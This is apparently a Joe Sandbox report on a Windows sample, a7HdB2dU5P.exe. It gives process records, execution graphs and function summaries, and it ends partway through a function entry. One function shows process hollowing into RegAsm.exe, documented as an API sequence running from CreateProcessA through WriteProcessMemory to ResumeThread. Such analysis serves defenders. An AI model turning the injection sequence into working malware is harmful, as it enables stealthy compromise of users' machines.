                                                                General

                                                                Target ID:0
                                                                Start time:03:52:04
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\Desktop\a7HdB2dU5P.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\a7HdB2dU5P.exe"
                                                                Imagebase:0x5d0000
                                                                File size:374'784 bytes
                                                                MD5 hash:EC5818DECCA5D6703E23C9DB8A772997
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:03:52:04
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:03:52:06
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                Imagebase:0xc40000
                                                                File size:65'440 bytes
                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:44.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:15.4%
                                                                  Total number of Nodes:39
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 554 28c2145 555 28c217d CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 554->555 557 28c235a WriteProcessMemory 555->557 558 28c239f 557->558 559 28c23a4 WriteProcessMemory 558->559 560 28c23e1 WriteProcessMemory Wow64SetThreadContext ResumeThread 558->560 559->558 561 c60988 562 c609aa 561->562 571 c6053c 562->571 565 c60ad6 569 c6053c VirtualProtectEx 569->565 572 c61100 571->572 573 c612ce VirtualProtectEx 572->573 574 c60aa0 573->574 574->565 574->569 575 c61268 574->575 579 c6121c 574->579 583 c61270 574->583 587 c610f4 574->587 576 c61230 575->576 576->575 577 c612ce VirtualProtectEx 576->577 578 c612ff 577->578 578->565 580 c6122a 579->580 581 c612ce VirtualProtectEx 580->581 582 c612ff 581->582 582->565 584 c612bb VirtualProtectEx 583->584 586 c612ff 584->586 586->565 588 c61155 587->588 589 c612ce VirtualProtectEx 588->589 590 c612ff 589->590 590->565 601 c60979 602 c609aa 601->602 603 c6053c VirtualProtectEx 602->603 604 c60aa0 603->604 605 c60ad6 604->605 606 c610f4 VirtualProtectEx 604->606 607 c61270 VirtualProtectEx 604->607 608 c6121c VirtualProtectEx 604->608 609 c6053c VirtualProtectEx 604->609 610 c61268 VirtualProtectEx 604->610 606->605 607->605 608->605 609->605 610->605

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00C60244 1 Function_00C60444 2 Function_00C604C5 3 Function_00C60B40 4 Function_00C601C0 5 Function_00C604C1 6 Function_00C6004D 7 Function_00C60148 8 Function_00C600C8 9 Function_00C60548 10 Function_00C60848 11 Function_00C60BC8 12 Function_00C604C9 13 Function_00C60A57 13->3 13->9 23 Function_00C60C58 13->23 36 Function_00C61268 13->36 38 Function_00C610F4 13->38 40 Function_00C61270 13->40 66 Function_00C6121C 13->66 78 Function_00C60530 13->78 79 Function_00C6053C 13->79 14 Function_00C60154 15 Function_00C600D4 16 Function_00C60254 17 Function_028C1F9E 18 Function_00C601D5 19 Function_00C60450 20 Function_00C604DF 21 Function_00C60F5F 33 Function_00C6026C 21->33 22 Function_00C6045D 24 Function_00C608D8 25 Function_00C600E4 26 Function_00C60165 27 Function_00C601E5 28 Function_00C60465 29 Function_00C60060 30 Function_00C60260 31 Function_00C60461 32 Function_028C1D2B 34 Function_00C6046D 35 Function_00C608E8 36->33 37 Function_00C60469 38->33 39 Function_00C60475 41 Function_00C60070 42 Function_00C600F0 43 Function_00C60471 44 Function_00C6027C 45 Function_00C6047D 46 Function_00C604FD 47 Function_00C60178 48 Function_00C601F8 49 Function_00C60479 50 Function_00C604F9 51 Function_00C60979 51->3 51->9 51->23 51->36 51->38 51->40 51->66 70 Function_00C60524 51->70 51->78 51->79 52 Function_00C60100 53 Function_00C60080 54 Function_00C60501 55 Function_028C2145 56 Function_00C6010C 57 Function_00C60988 57->3 57->9 57->23 57->36 57->38 57->40 57->66 57->70 57->78 57->79 58 Function_00C60188 59 Function_00C60208 60 Function_00C61216 61 Function_00C60214 62 Function_00C60015 63 Function_00C60090 64 Function_00C60B10 64->3 65 Function_00C6011C 66->33 67 Function_00C60198 68 Function_00C60498 69 Function_00C610A6 71 Function_00C600A0 72 Function_00C6012C 73 Function_00C610AC 73->33 74 Function_00C601A8 75 Function_00C601B4 76 Function_00C60234 77 Function_00C600B0 78->33 79->33 80 Function_00C600BC 81 Function_00C6013C

                                                                  Executed Functions

                                                                  Function 028C2145 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,028C20B7,028C20A7), ref: 028C22B4
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028C22C7
                                                                  • Wow64GetThreadContext.KERNEL32(00000300,00000000), ref: 028C22E5
                                                                  • ReadProcessMemory.KERNELBASE(00000304,?,028C20FB,00000004,00000000), ref: 028C2309
                                                                  • VirtualAllocEx.KERNELBASE(00000304,?,?,00003000,00000040), ref: 028C2334
                                                                  • WriteProcessMemory.KERNELBASE(00000304,00000000,?,?,00000000,?), ref: 028C238C
                                                                  • WriteProcessMemory.KERNELBASE(00000304,00400000,?,?,00000000,?,00000028), ref: 028C23D7
                                                                  • WriteProcessMemory.KERNELBASE(00000304,?,?,00000004,00000000), ref: 028C2415
                                                                  • Wow64SetThreadContext.KERNEL32(00000300,00D10000), ref: 028C2451
                                                                  • ResumeThread.KERNELBASE(00000300), ref: 028C2460
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1693434535.00000000028C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_28c1000_a7HdB2dU5P.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                  • API String ID: 2687962208-1257834847
                                                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                  • Instruction ID: 9683214e330df2a6ffebdbb801ab531dfddb76b4ab142f6fc772df1cb022c18c
                                                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                  • Instruction Fuzzy Hash: 99B1E47664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CEB355D774FA418B94
                                                                  Function 00C61268 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 23 c61268-c6126d 24 c61230-c61238 call c6026c 23->24 25 c6126f-c612c7 23->25 24->23 29 c612ce-c612fd VirtualProtectEx 25->29 30 c61304-c61325 29->30 31 c612ff 29->31 31->30
                                                                  APIs
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C612F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692731646.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_c60000_a7HdB2dU5P.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: ece1d6da22a1c81dbb2f75ad306e1022c489839994ee1129b56cc6887dcd14cf
                                                                  • Instruction ID: aa6109c6aa069af5da9d2bb390a3127b7aa87c2e53c4565edd3727e30347c800
                                                                  • Opcode Fuzzy Hash: ece1d6da22a1c81dbb2f75ad306e1022c489839994ee1129b56cc6887dcd14cf
                                                                  • Instruction Fuzzy Hash: F42114B59002599FCB10DFA9D884AEEBBF0FF48310F24842EE959A7260C7745944CFA5
                                                                  Function 00C61270 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 34 c61270-c612fd VirtualProtectEx 37 c61304-c61325 34->37 38 c612ff 34->38 38->37
                                                                  APIs
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C612F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692731646.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_c60000_a7HdB2dU5P.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 97ea83a094f3d711d53e1ef8fa595ea30a7f7fdc7e63060786c0e2a1c54a79aa
                                                                  • Instruction ID: 17f5c75858614ea5350117a4efda1632a113ce880281caf9f08f2c8e8d803be1
                                                                  • Opcode Fuzzy Hash: 97ea83a094f3d711d53e1ef8fa595ea30a7f7fdc7e63060786c0e2a1c54a79aa
                                                                  • Instruction Fuzzy Hash: A22122B1900259DFCB10DFAAC880ADEFBF4FF48310F10842AE959A7250C774A944CFA5

                                                                  Execution Graph

                                                                  Execution Coverage:1.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:71.9%
                                                                  Total number of Nodes:57
                                                                  Total number of Limit Nodes:14
                                                                  execution_graph 20070 40d2c0 20071 40d2c9 20070->20071 20072 40d2d1 GetInputState 20071->20072 20073 40d4ae ExitProcess 20071->20073 20074 40d2de 20072->20074 20075 40d2e6 GetCurrentThreadId GetCurrentProcessId 20074->20075 20076 40d4a9 20074->20076 20078 40d311 20075->20078 20089 446f80 FreeLibrary 20076->20089 20084 40ed90 20078->20084 20080 40d49b 20080->20076 20088 412290 CoInitialize 20080->20088 20086 40edc4 20084->20086 20085 40ee76 LoadLibraryExW 20087 40ee8b 20085->20087 20086->20085 20087->20080 20089->20073 20090 410480 20093 4106dd 20090->20093 20091 410aa3 20093->20091 20094 446fa0 RtlAllocateHeap 20093->20094 20094->20093 20095 447600 20096 447624 20095->20096 20097 44797e 20096->20097 20099 4479ab 20096->20099 20100 447a4e 20096->20100 20103 447560 LdrInitializeThunk 20096->20103 20097->20099 20097->20100 20104 447560 LdrInitializeThunk 20097->20104 20100->20099 20101 447560 LdrInitializeThunk 20100->20101 20101->20100 20103->20097 20104->20100 20105 444200 20106 444246 RtlAllocateHeap 20105->20106 20107 44421a 20105->20107 20107->20106 20108 44a7e0 20110 44a7f0 20108->20110 20109 44a93e 20110->20109 20112 447560 LdrInitializeThunk 20110->20112 20112->20109 20113 444282 20114 444302 RtlFreeHeap 20113->20114 20115 444308 20113->20115 20116 444290 20113->20116 20114->20115 20116->20114 20117 447ede 20118 447bb0 20117->20118 20122 447d03 20117->20122 20119 447cf3 20118->20119 20123 447560 LdrInitializeThunk 20118->20123 20121 447c71 20123->20121 20124 40febc 20126 40fec8 20124->20126 20127 40fed9 20124->20127 20127->20126 20130 41044e 20127->20130 20131 446fa0 RtlAllocateHeap 20127->20131 20128 410aa3 20130->20128 20130->20130 20132 446fa0 RtlAllocateHeap 20130->20132 20131->20127 20132->20130 20133 40effc 20139 40f7e0 RtlAllocateHeap 20133->20139 20135 40f0b0 20136 40f430 20135->20136 20140 40f7e0 RtlAllocateHeap 20135->20140 20138 40eeb0 20138->20133 20138->20135 20139->20138 20140->20135

                                                                  Executed Functions

                                                                  Function 00410480 Relevance: 25.4, Strings: 20, Instructions: 435COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 410480-4106db 1 41070d-410733 0->1 2 4106dd-4106df 0->2 7 4108f1-410958 1->7 8 410760-410790 1->8 9 4108c5-4108c9 1->9 10 410a04-410a18 1->10 11 4107f6-410818 1->11 12 41073a-410743 1->12 13 4107ed-4107f1 1->13 14 4108ce-4108ea 1->14 3 4106e0-41070b call 411bb0 2->3 3->1 34 41098b-410993 7->34 35 41095a 7->35 39 410792 8->39 40 4107cb-4107e6 8->40 15 410b52 9->15 50 410a1f-410a28 10->50 37 41084b-41087b 11->37 38 41081a 11->38 12->8 36 410b5c-410b7b 13->36 14->7 14->10 16 410ac0-410ad1 14->16 17 410b20 14->17 18 410b40 14->18 19 410aa3 14->19 20 410b25-410b2c 14->20 21 410a86-410a9c call 446fa0 14->21 22 410b86-410b8d 14->22 23 410b4b 14->23 24 410a4a-410a65 14->24 25 410a2f-410a31 14->25 26 410ab0-410ab8 14->26 27 410b10 14->27 28 410b33 14->28 29 410b12 14->29 30 410af6-410b07 14->30 31 410b19 14->31 32 410b39-410b3f 14->32 33 410ad8-410af0 14->33 15->36 16->33 17->20 18->23 19->26 20->18 20->23 20->28 20->32 21->16 21->17 21->18 21->19 21->20 21->22 21->23 21->26 21->27 21->28 21->29 21->30 21->31 21->32 21->33 43 410b94 22->43 44 410b96-410ba5 22->44 23->15 62 410a6c-410a7f 24->62 61 410a38-410a43 25->61 26->27 29->31 30->27 31->17 32->18 33->30 48 4109b1-4109c0 34->48 49 410995-41099f 34->49 47 410960-410989 call 411da0 35->47 36->7 36->9 36->10 36->11 36->13 36->14 36->16 36->17 36->18 36->19 36->20 36->21 36->22 36->23 36->24 36->25 36->26 36->27 36->28 36->29 36->30 36->31 36->32 36->33 45 4108a6-4108be 37->45 46 41087d-41087f 37->46 42 410820-410849 call 411d20 38->42 41 4107a0-4107c9 call 411c20 39->41 40->7 40->9 40->10 40->11 40->13 40->14 40->16 40->17 40->18 40->19 40->20 40->21 40->22 40->23 40->24 40->25 40->26 40->27 40->28 40->29 40->30 40->31 40->32 40->33 41->40 42->37 43->44 45->7 45->9 45->10 45->14 45->16 45->17 45->18 45->19 45->20 45->21 45->22 45->23 45->24 45->25 45->26 45->27 45->28 45->29 45->30 45->31 45->32 45->33 63 410880-4108a4 call 411ca0 46->63 47->34 55 4109c2-4109c4 48->55 56 4109e5-4109fd 48->56 54 4109a0-4109af 49->54 50->16 50->17 50->18 50->19 50->20 50->21 50->22 50->23 50->24 50->25 50->26 50->27 50->28 50->29 50->30 50->31 50->32 50->33 54->48 54->54 70 4109d0-4109e1 55->70 56->10 61->16 61->17 61->18 61->19 61->20 61->21 61->22 61->23 61->24 61->26 61->27 61->28 61->29 61->30 61->31 61->32 61->33 62->16 62->17 62->18 62->19 62->20 62->21 62->22 62->23 62->26 62->27 62->28 62->29 62->30 62->31 62->32 62->33 63->45 70->70 71 4109e3 70->71 71->56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (Y6[$.AtC$89$9]_$9lji$D!M#$Gq\s$Gu@w$PQ$S%U'$XyR{$Ym]o$hI2K$k=W?$pE}G$w%r'$yQrS$zMzO$us$f
                                                                  • API String ID: 0-1367088923
                                                                  • Opcode ID: bd0f71112ca25ec8b8a9f2482f83a574c3380875e503502dc80236c562b04332
                                                                  • Instruction ID: a09763c792eff68ee2d066390d92369163d89c9f7aba8ef65be1ebf7ec03b0a0
                                                                  • Opcode Fuzzy Hash: bd0f71112ca25ec8b8a9f2482f83a574c3380875e503502dc80236c562b04332
                                                                  • Instruction Fuzzy Hash: A30266B4108380EFD3609F65E880B5BBBE4FB86745F40492DF5C99B262D774D884CB5A
                                                                  Function 0040FEBC Relevance: 13.2, Strings: 10, Instructions: 710COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 74 40febc-40fec1 75 40fed0 74->75 76 410121-4101d3 call 40ca20 74->76 77 40fed2-40fed4 74->77 78 40fec8-40fecf 74->78 79 40fed9-4100ca 74->79 80 410118-41011c 74->80 75->77 81 410426-410432 76->81 90 410340 76->90 91 410349-41034f 76->91 92 4103c8-4103f5 76->92 93 41044e 76->93 94 410211-410218 76->94 95 410350-410358 76->95 96 410455-41045c 76->96 97 4101da 76->97 98 41021a-410234 76->98 99 4101e0 76->99 100 410360-410365 76->100 101 410420 76->101 102 410323-410339 76->102 103 4102e7-4102ee 76->103 104 4103a6-4103c1 call 446fa0 76->104 105 41036c-41036f 76->105 106 4101f0 76->106 107 410376-410380 76->107 108 4101f9-41020a 76->108 109 4102fb-41031c 76->109 110 41043d-41044c 76->110 111 4103fc-41040b 76->111 83 410435-41043c 77->83 78->75 84 4100fc-410104 79->84 85 4100cc-4100cf 79->85 80->81 81->83 88 410107-410111 84->88 87 4100d0-4100fa call 412110 85->87 87->84 88->76 88->80 88->81 88->90 88->91 88->92 88->93 88->94 88->95 88->96 88->97 88->98 88->99 88->100 88->101 88->102 88->103 88->104 88->105 88->106 88->107 88->108 88->109 88->110 88->111 90->91 91->95 92->81 92->93 92->96 92->101 92->105 92->107 92->110 92->111 114 41073a-410743 92->114 130 410760-410790 92->130 93->96 115 41026f-410296 94->115 95->100 96->114 116 410236 98->116 117 41026a-41026c 98->117 99->106 100->81 100->93 100->96 100->101 100->105 100->107 100->110 100->111 100->114 102->81 102->90 102->91 102->92 102->93 102->95 102->96 102->100 102->101 102->104 102->105 102->107 102->110 102->111 103->109 104->81 104->92 104->93 104->96 104->100 104->101 104->105 104->107 104->110 104->111 104->114 104->130 105->81 105->93 105->96 105->101 105->107 105->110 105->114 106->108 122 410388-41039f 107->122 108->81 108->90 108->91 108->92 108->93 108->94 108->95 108->96 108->98 108->100 108->101 108->102 108->103 108->104 108->105 108->107 108->109 108->110 108->111 109->81 109->90 109->91 109->92 109->93 109->95 109->96 109->100 109->101 109->102 109->104 109->105 109->107 109->110 109->111 110->81 111->101 114->130 126 410298 115->126 127 4102ca-4102d5 115->127 123 410240-410268 call 412210 116->123 117->115 122->81 122->92 122->93 122->96 122->100 122->101 122->104 122->105 122->107 122->110 122->111 122->114 122->130 123->117 132 4102a0-4102c8 call 412190 126->132 137 4102d9-4102e0 127->137 133 410792 130->133 134 4107cb-4107e6 130->134 132->127 138 4107a0-4107c9 call 411c20 133->138 143 410ac0-410ad1 134->143 144 410b20 134->144 145 410b40 134->145 146 410aa3 134->146 147 4108c5-4108c9 134->147 148 410b25-410b2c 134->148 149 410a04-410a18 134->149 150 410a86-410a9c call 446fa0 134->150 151 410b86-410b8d 134->151 152 410b4b 134->152 153 410a4a-410a65 134->153 154 4107ed-4107f1 134->154 155 410a2f-410a31 134->155 156 4108ce-4108ea 134->156 157 4108f1-410958 134->157 158 410ab0-410ab8 134->158 159 410b10 134->159 160 410b33 134->160 161 410b12 134->161 162 4107f6-410818 134->162 163 410af6-410b07 134->163 164 410b19 134->164 165 410b39-410b3f 134->165 166 410ad8-410af0 134->166 137->81 137->90 137->91 137->92 137->93 137->95 137->96 137->100 137->101 137->102 137->103 137->104 137->105 137->107 137->109 137->110 137->111 138->134 143->166 144->148 145->152 146->158 172 410b52 147->172 148->145 148->152 148->160 148->165 180 410a1f-410a28 149->180 150->143 150->144 150->145 150->146 150->148 150->151 150->152 150->158 150->159 150->160 150->161 150->163 150->164 150->165 150->166 170 410b94 151->170 171 410b96-410ba5 151->171 152->172 185 410a6c-410a7f 153->185 167 410b5c-410b7b 154->167 182 410a38-410a43 155->182 156->143 156->144 156->145 156->146 156->148 156->149 156->150 156->151 156->152 156->153 156->155 156->157 156->158 156->159 156->160 156->161 156->163 156->164 156->165 156->166 173 41098b-410993 157->173 174 41095a 157->174 158->159 161->164 168 41084b-41087b 162->168 169 41081a 162->169 163->159 164->144 165->145 166->163 167->143 167->144 167->145 167->146 167->147 167->148 167->149 167->150 167->151 167->152 167->153 167->154 167->155 167->156 167->157 167->158 167->159 167->160 167->161 167->162 167->163 167->164 167->165 167->166 183 4108a6-4108be 168->183 184 41087d-41087f 168->184 181 410820-410849 call 411d20 169->181 170->171 172->167 178 4109b1-4109c0 173->178 179 410995-41099f 173->179 177 410960-410989 call 411da0 174->177 177->173 192 4109c2-4109c4 178->192 193 4109e5-4109fd 178->193 191 4109a0-4109af 179->191 180->143 180->144 180->145 180->146 180->148 180->150 180->151 180->152 180->153 180->155 180->158 180->159 180->160 180->161 180->163 180->164 180->165 180->166 181->168 182->143 182->144 182->145 182->146 182->148 182->150 182->151 182->152 182->153 182->158 182->159 182->160 182->161 182->163 182->164 182->165 182->166 183->143 183->144 183->145 183->146 183->147 183->148 183->149 183->150 183->151 183->152 183->153 183->155 183->156 183->157 183->158 183->159 183->160 183->161 183->163 183->164 183->165 183->166 189 410880-4108a4 call 411ca0 184->189 185->143 185->144 185->145 185->146 185->148 185->150 185->151 185->152 185->158 185->159 185->160 185->161 185->163 185->164 185->165 185->166 189->183 191->178 191->191 195 4109d0-4109e1 192->195 193->149 195->195 200 4109e3 195->200 200->193
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 13$58$89$8<$9lji$I1$PQ$w%r'$us$f
                                                                  • API String ID: 0-2782953580
                                                                  • Opcode ID: 9b76d46fa66223bdcbb40c86f8213a292735e728758ff7986478ce89d37e3186
                                                                  • Instruction ID: d3e6123da5a87937c4ce527ea16b001d947dd1f89a44154d0df95b1e97982e4a
                                                                  • Opcode Fuzzy Hash: 9b76d46fa66223bdcbb40c86f8213a292735e728758ff7986478ce89d37e3186
                                                                  • Instruction Fuzzy Hash: CB4289B4104740DFD324CF25E884B1ABBB5FF8A305F54896DE48A8B2A2D735E846CF55
                                                                  Function 0040D2C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 202 40d2c0-40d2cb call 445d80 205 40d2d1-40d2e0 GetInputState call 43cfb0 202->205 206 40d4ae-40d4b0 ExitProcess 202->206 209 40d2e6-40d30f GetCurrentThreadId GetCurrentProcessId 205->209 210 40d4a9 call 446f80 205->210 211 40d311 209->211 212 40d346-40d368 209->212 210->206 214 40d320-40d344 call 40d4c0 211->214 215 40d396-40d398 212->215 216 40d36a 212->216 214->212 219 40d446-40d46a 215->219 220 40d39e-40d3bb 215->220 218 40d370-40d394 call 40d530 216->218 218->215 224 40d496 call 40ed90 219->224 225 40d46c-40d46f 219->225 221 40d3e6-40d40f 220->221 222 40d3bd-40d3bf 220->222 221->219 228 40d411 221->228 227 40d3c0-40d3e4 call 40d5c0 222->227 232 40d49b-40d49d 224->232 229 40d470-40d494 call 40d6c0 225->229 227->221 234 40d420-40d444 call 40d640 228->234 229->224 232->210 236 40d49f-40d4a4 call 412290 call 410470 232->236 234->219 236->210
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                  • String ID: 'GFA$edgf
                                                                  • API String ID: 1029096631-957644222
                                                                  • Opcode ID: 502ce430d97d9e37560fd800a07c2546b427697bcdc0870340be3cc5bdd76706
                                                                  • Instruction ID: 7ad23a135721fdd6d89255751fe31a0f6133d9381a8379ca88b8a81bac4427f5
                                                                  • Opcode Fuzzy Hash: 502ce430d97d9e37560fd800a07c2546b427697bcdc0870340be3cc5bdd76706
                                                                  • Instruction Fuzzy Hash: 7C414C7480D2809BC301BF99D544A1EFBE5AF52709F148D2DE5C4A73A2C73AD858CB6B
                                                                  Function 00447600 Relevance: 6.9, Strings: 5, Instructions: 614COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 244 447600-44762a call 447f10 247 447644-447661 244->247 248 447716-44772f 244->248 249 4477f6-447836 244->249 250 447710 244->250 251 447730 244->251 252 447750-44778f 244->252 253 447631-44763d 244->253 254 4479c2-4479c4 244->254 255 447732-447749 call 44a5f0 244->255 256 4476ac-4476c2 244->256 257 4479c9-4479f8 244->257 258 4479ab-4479ad 244->258 271 447694-4476a5 247->271 272 447663 247->272 248->251 267 447838 249->267 268 44786a-447873 249->268 250->248 251->255 259 447791 252->259 260 4477ca-4477d3 252->260 253->247 253->248 253->249 253->250 253->251 253->252 253->255 253->256 253->257 253->258 266 447d05-447d0c 254->266 255->249 255->252 255->257 255->258 278 447a8b-447a8d 255->278 292 447a92-447ab4 call 447f10 255->292 295 447b2f-447b3b 255->295 297 447abb-447adb 255->297 261 4476f4-447700 256->261 262 4476c4 256->262 269 447a26-447a31 257->269 270 4479fa 257->270 258->254 263 4479b4-4479b9 258->263 264 4479c0 258->264 265 447b4f 258->265 281 4477a0-4477c8 call 448820 259->281 275 447891-4478a6 call 445ab0 260->275 282 4477d9-4477df 260->282 261->255 279 4476d0-4476f2 call 448720 262->279 263->264 301 447b58 265->301 283 447840-447868 call 4487a0 267->283 274 447875-44787b 268->274 268->275 276 447a33-447a3b 269->276 277 447a7c-447a84 269->277 284 447a00-447a24 call 448890 270->284 271->249 271->252 271->255 271->256 271->257 271->258 271->278 285 447670-447692 call 4486a0 272->285 287 447880-44788f 274->287 323 4478c1-447925 275->323 324 4478a8-4478ab 275->324 288 447a40-447a47 276->288 277->278 291 447b40 277->291 277->292 293 447b42-447b4a 277->293 294 447d0d-447d2d 277->294 277->295 296 447b1f-447b25 277->296 277->297 298 447d9c-447dbc 278->298 279->261 281->260 300 4477e0-4477ef 282->300 283->268 284->269 285->271 287->275 287->287 305 447a50-447a56 288->305 306 447a49-447a4c 288->306 292->291 292->293 292->294 292->295 292->296 292->297 332 447e38-447e45 292->332 333 447e7a-447e87 292->333 293->294 316 447d56-447d5d 294->316 317 447d2f 294->317 295->291 296->295 312 447b04-447b18 297->312 313 447add-447adf 297->313 310 447de6-447df0 298->310 311 447dbe-447dbf 298->311 300->300 315 4477f1 300->315 301->266 305->277 322 447a58-447a74 call 447560 305->322 306->288 320 447a4e 306->320 328 447df2-447dff 310->328 329 447e18 310->329 326 447dc0-447de4 call 448890 311->326 312->254 312->263 312->264 312->265 312->294 312->296 312->301 330 447eb6-447ebb 312->330 331 447ed0 312->331 312->332 312->333 327 447ae0-447b02 call 448900 313->327 315->275 316->298 321 447d5f-447d6a 316->321 334 447d30-447d54 call 448890 317->334 320->277 337 447d70-447d77 321->337 352 447a79 322->352 340 447956-447961 323->340 341 447927 323->341 339 4478b0-4478bf 324->339 326->310 327->312 344 447e00-447e07 328->344 329->278 329->291 329->292 329->293 329->294 329->295 329->296 329->297 329->301 329->330 329->331 329->332 329->333 345 447e1f-447e29 call 447560 329->345 330->331 346 447e74 332->346 347 447e47 332->347 333->332 336 447e89 333->336 334->316 349 447e90-447eb2 call 448980 336->349 350 447d80-447d86 337->350 351 447d79-447d7c 337->351 339->323 339->339 354 447963-44796b 340->354 355 44799f-4479a4 340->355 353 447930-447954 call 448890 341->353 358 447e10-447e16 344->358 359 447e09-447e0c 344->359 368 447e2e-447e31 345->368 346->333 361 447e50-447e72 call 448980 347->361 376 447eb4 349->376 350->298 364 447d88-447d94 call 447560 350->364 351->337 363 447d7e 351->363 352->277 353->340 366 447970-447977 354->366 355->257 355->258 355->278 355->291 355->292 355->293 355->294 355->295 355->296 355->297 358->329 358->345 359->344 367 447e0e 359->367 361->346 363->298 377 447d99 364->377 373 447980-447986 366->373 374 447979-44797c 366->374 367->329 368->278 368->291 368->292 368->293 368->294 368->295 368->296 368->297 368->301 368->330 368->331 368->332 368->333 373->355 379 447988-447997 call 447560 373->379 374->366 378 44797e 374->378 376->332 377->298 378->355 381 44799c 379->381 381->355
                                                                  Strings
                                                                  Memory Dump Source
